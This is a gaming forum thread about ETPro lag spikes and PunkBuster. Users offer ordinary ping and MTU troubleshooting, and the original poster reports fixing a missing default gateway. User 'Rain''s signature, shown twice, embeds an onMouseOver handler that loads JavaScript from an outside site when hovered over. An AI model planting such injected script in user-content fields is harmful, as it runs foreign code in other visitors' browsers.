I get 8 second pauses

Discussion for any ET/ETPro/BayonET bugs or cheats you find...

Moderators: Forum moderators, developers

Certicus

I get 8 second pauses

Post by Certicus »

I need help on the following... See, when I use etpro no matter what version I get this wierd 8 second pause.... which gradually gets worse and at about 3 mins of play I just can't play.... I run into a firefight and well... my lag causes me to sit there till I find I'm dead..... It sux..... It doesn't doit on any other mod..... and what I think could be causing it is when I press the ` to bring up the hud thingy..... I notice I'm flooded with blue messages where the settings have been set..... what can I do to fix this prob?
Certicus

Post by Certicus »

Oh I forgot to add...... it has punkbuster before everything.... like eg Punkbuster: cg_.... but it shows about 30 diff settings.... and it repeats them every 8 seconds
meLonF

Post by meLonF »

Certicus wrote:Oh I forgot to add...... it has punkbuster before everything.... like eg Punkbuster: cg_.... but it shows about 30 diff settings.... and it repeats them every 8 seconds
hmmm... this sounds similar to something i'm experiencing

i get huge lag's that last for about 5 seconds ... they occur on what seems to be a regular basis. The weird thing is i can still see everyone moving around as normal, and they are all moving at normal speed (not warping or anything) but I get a connection interupted symbol and can't move. The lag-o-meter thing shows solid green as well. after about 5 seconds of being unable to move, it suddenly all goes back to normal (although i find i'm usually dead :P )

this is on a fresh install of windows / ET with PB manually updated :?

bani, will it help for me to post some demos for you?
DG

Post by DG »

Certicus when it happens take a screenshot of all the crap in the console, just type in /screenshotjpeg
bani
Site Admin

Post by bani »

sounds like you have network problems.
Threshold

Post by Threshold »

I'd say check you network connection.

first click on start then run

then type command or cmd

this should bring up a dos promt.

depending on what windows version you have type

XP= ipconfig
98/ME= winipconfig -I think. it's been a while :)

Now find you default gateway ip.

Do a nice little extended ping to it.

type

ping 68.1.2.1.3 -t

See if you drop any ping's

hitCtrl+C to stop the ping

If you are good to that ip you should see no drops

Reply from 68.1.2.1.3: bytes=32 time=8ms TTL=64
Reply from 68.1.2.1.3: bytes=32 time=12ms TTL=64
Reply from 68.1.2.1.3: bytes=32 time=10ms TTL=64

If you drop any pings you will see this

Reply from 68.1.2.1.3: bytes=32 time=8ms TTL=64
Request timed out.
Reply from 68.1.2.1.3: bytes=32 time=10ms TTL=64
Request timed out.
Reply from 68.1.2.1.3: bytes=32 time=12ms TTL=64.

Now I would say if you drop ping to you default gateway you have a issue with either.

Local Nic card/Ethernet cable to Cable/DSL modem. You even might even have an issue with the cable or DSL run in your house. Get you service provider out.

If you don't see any problem to that Ip then find one of a server you know you have trouble on and ping that. Most likly you can get your service provider out to check out your setup..

DO you have lag with pauses with any other games?
ReyalP

Post by ReyalP »

One thing I've noticed with DSL related packet loss problems (and this *probably* goes for other media too) is that they don't show up nearly as much with the small 54 byte packets that ping users by default.

try ping -t -l 1000
for 1000 byte packets instead.

Note that the ping times for large packets will be longer, and you probably shouldn't set the size bigger than your MTU (which is usally a bit over 1400)
send lawyers, guns and money
Rain

Post by Rain »

duke'ku also has this problem, he's blaming PB for it.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Certicus

Post by Certicus »

Thx people, turned out I didn't even have a default gateway set..... so I just manually deleted the network protocol from the network properties and reinstalled it.... Oh and for win 98 it's Ipconfig aswell
Threshold

Post by Threshold »

SCDS_reyalP wrote:One thing I've noticed with DSL related packet loss problems (and this *probably* goes for other media too) is that they don't show up nearly as much with the small 54 byte packets that ping users by default.

try ping -t -l 1000
for 1000 byte packets instead.

Note that the ping times for large packets will be longer, and you probably shouldn't set the size bigger than your MTU (which is usally a bit over 1400)
Data Gram size for Ethernet is 1500 max.
duke'ku

Post by duke'ku »

Rain wrote:duke'ku also has this problem, he's blaming PB for it.
it only happens to me on pb servers.

it went away after a pb update, and at the next pb update it was back. it seems to be gone with the latest update.
Rain

Post by Rain »

Threshold wrote:
SCDS_reyalP wrote:Note that the ping times for large packets will be longer, and you probably shouldn't set the size bigger than your MTU (which is usally a bit over 1400)
But most DSL users are stuck with PPPoE, which incurs a slight overhead (because of the PPP headers at the start of each packet.)
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Threshold

Post by Threshold »

Rain wrote:
Threshold wrote:
SCDS_reyalP wrote:Note that the ping times for large packets will be longer, and you probably shouldn't set the size bigger than your MTU (which is usally a bit over 1400)
But most DSL users are stuck with PPPoE, which incurs a slight overhead (because of the PPP headers at the start of each packet.)
I have no clue about DSL. I work DS3 and UP! :)
bani
Site Admin

Post by bani »

on gigabit ethernet i use mtu of 9000...
ReyalP

Post by ReyalP »

so much for my hopes of not dragging the thread offtopic by going into the gory details... :lol:
send lawyers, guns and money